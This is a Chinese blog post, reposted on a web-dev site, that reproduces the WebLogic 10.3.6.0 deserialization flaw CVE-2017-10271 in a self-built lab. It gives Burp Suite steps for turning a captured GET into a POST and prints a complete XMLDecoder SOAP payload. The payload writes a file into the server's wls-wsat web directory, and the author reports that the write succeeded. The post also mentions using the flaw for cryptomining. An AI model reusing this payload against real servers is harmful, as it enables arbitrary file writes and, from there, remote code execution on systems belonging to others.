分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 教程案例

关于weblogic 10.3.6.0 的漏洞复现(1)

发布时间:2023-09-06 01:53责任编辑:傅花花关键词:weblogic

最近小R 搭建了个weblogic,  因为之前在公司找系统漏洞的时候,发现了这个漏洞,所以为了特地专门搭建了个10.3.6.0版本。

漏洞编号: CVE-2017-10271

漏洞的描述:就是weblogic 的WLS组件中存在了CVE-2017-10271远程代码的执行漏洞,可以构造请求运行weblogic中间件的主机来进行攻击。此外,还可以利用此漏洞来进行挖矿。

1. 环境就自己去官网搭建吧。  要10.3.6.0这个版本哦

2. 目前发现就是这个页面存在漏洞。

3. 通过Burpsuite来抓包,然后修改数据

抓的包是GET请求,注意:需要改为POST,然后在代码后面加入

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
?????<soapenv:Header>
???????<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
????????<java version="1.6.0" class="java.beans.XMLDecoder">
???????????????????<object class="java.io.PrintWriter">
???????????????????????<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/R.Hacker</string><void method="println">
???????????????????????<string>xmldecoder_vul_test</string></void><void method="close"/>
???????????????????</object>
???????????</java>
???????</work:WorkContext>
?????</soapenv:Header>
?????<soapenv:Body/>
</soapenv:Envelope>

 发一下我改的:

 实验成功,成功写入代码!

 这只是一个简单的案例。 后续会陆续更新哈

关于weblogic 10.3.6.0 的漏洞复现(1)

原文地址:https://www.cnblogs.com/R-Hacker/p/9007438.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved